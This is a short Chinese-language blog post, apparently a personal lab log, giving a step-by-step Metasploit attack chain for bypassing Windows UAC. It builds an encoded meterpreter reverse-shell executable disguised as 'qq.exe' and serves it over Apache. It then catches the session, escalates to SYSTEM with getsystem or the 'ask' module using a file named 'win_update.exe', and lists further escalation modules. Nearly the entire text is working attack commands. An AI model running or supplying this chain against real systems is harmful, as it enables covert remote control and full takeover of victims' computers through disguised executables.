绕过uac提权

Posted by Tattoo on 2020-05-15
Estimated Reading Time 1 Minutes
Words 274 In Total
Viewed Times

绕过uac提权

比较简单,做个步骤记录

1. 生成exe远控文件

1
2
3
4
5
6
7
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o /opt/qq.exe

-b 避免出现的字符
-e 编码器
-i 编码次数
-f 输出的文件类型
-o 输出路径

2. 将exe文件上传到目标机

开启apache服务

1
2
service apache2 start
cp /opt/qq.exe /var/www/html

3. 目标机访问并下载

1
http://攻击机ip/qq.exe

4. msfconsole

1
2
3
4
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip
exploit

5. 运行exe文件

此时,会返回一个session会话

进入它进行提权

1
2
3
sessions -i 1
load priv --更新插件
getsystem

6. getsystem失败

1
2
3
4
5
use exploit/windows/local/ask	--进入提权模块
set lhost ip
set filename win_update.exe
set session 1
exploit

7. 再获得一个session

1
2
3
sessions -i 2
load priv
getsystem

8. 提权成功

1
2
shell	--获取shell
whoami --查看当前用户,为system

9. 总结

其他提权模块

1
2
3
4
5
6
7
8
9
use exploit/windows/local/bypassuac_injection

use exploit/windows/local/ms13_053_schlamperei

use exploit/windows/local/ppr_flatten_rec

use exploit/windows/local/ms13_081_track_popup_menu

use exploit/windows/local/ms13_097_ie_registry_symlink

If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !